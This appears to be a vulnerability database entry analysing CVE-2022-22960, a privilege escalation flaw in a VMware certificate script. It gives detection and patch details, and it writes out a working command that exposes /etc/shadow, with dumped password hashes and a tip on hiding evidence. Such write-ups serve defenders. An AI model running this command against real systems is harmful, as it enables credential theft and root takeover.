Low
CVE-2022-22960
CVE-2022-22960
Description
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to ‘root’.
Add Assessment
Technical Analysis
There exists a vulnerability within /usr/local/horizon/scripts/publishCaCert.hzn where a local attacker can invoke the script to make any file world-readable. The script is intended to facilitate certificate management, allowing cert files to be copied into /etc/ssl/certs which is owned by root. The script can be invoked by the horizon user without a sudo password.
The script takes two arguments, the first a path to the file to copy, the second the name of the file to write to the destination. The source path argument can be any file, but the destination is only the final component of the path meaning the file will be placed in /etc/ssl/certs.
A local user running as horizon (such as from successfully exploiting CVE-2022-22954) can exploit this vulnerability to recover the shadow file by executing:
horizon [ /tmp ]$ sudo /usr/local/horizon/scripts/publishCaCert.hzn /etc/shadow shadow; cat /etc/ssl/certs/shadow root:$6$Y49xfSabYZeOAAKr$VN0QQ5IsF1swmo7PmW7SMwFpdxo.RuN2W1FEc/gF814JhnC/KU.FEBMVxDx5aRclwcfp8OYjFqzqNxtb3hQPz.:19131:0:60:7::: bin:x:18964:0:60:7::: daemon:x:18964:0:60:7::: messagebus:x:18964:0:60:7::: systemd-bus-proxy:x:18964:0:60:7::: systemd-journal-gateway:x:18964:0:60:7::: systemd-journal-remote:x:18964:0:60:7::: systemd-journal-upload:x:18964:0:60:7::: systemd-network:x:18964:0:60:7::: systemd-resolve:x:18964:0:60:7::: systemd-timesync:x:18964:0:60:7::: nobody:x:18964:0:60:7::: sshd:!:18964:0:60:7::: rabbitmq:!:18964::60:::: named:!:18964::60:::: postgres:!:18964:0:60:7::: horizon:!:18964:0:60:7::: sshuser:$6$1ppozTLmRlrslppH$8XxgQXUSOc.zUBTOkXFdaNR4Cmd2rPhyioLIQ.fiyvdIlMXGvpOWprt8JTZ12NOP1My2xqJpqewfP/BYLqvul1:18964:0:60:7::: elasticsearch:!:18964::60::::
Detection
The file that is written to the /etc/ssl/certs directory will still be owned by root making the attacker unable to delete it. A crafty attacker would backup an existing certificate file or create a new one, leak the file of their choosing and then overwrite it again with a legitimate certificate to remove the evidence of their leaked file. Users should look for files out of place in this directory, and inspect timestamps and the certificate contents to identify potential exploitation attempts of this vulnerability.
Remediation
VMWare patched this issue with hotfix HW-154129. The patch for the affected script adds validation to ensure that the argument is a certificate file.
Diff:
< . /usr/local/horizon/scripts/hzn-bin.inc < openssl x509 -noout -in $CERTFILE 2>/dev/null < < if [ $? -ne 0 ]; then < echo "ERROR: This is not a certificate file" < exit 1 < fi <
CVSS V3 Severity and Metrics
General Information
Vendors
- vmware
Products
- cloud foundation,
- identity manager 3.3.3,
- identity manager 3.3.4,
- identity manager 3.3.5,
- identity manager 3.3.6,
- vrealize automation,
- vrealize automation 7.6,
- vrealize suite lifecycle manager,
- workspace one access 20.10.0.0,
- workspace one access 20.10.0.1,
- workspace one access 21.08.0.0,
- workspace one access 21.08.0.1
Metasploit Modules
Exploited in the Wild
References
Miscellaneous
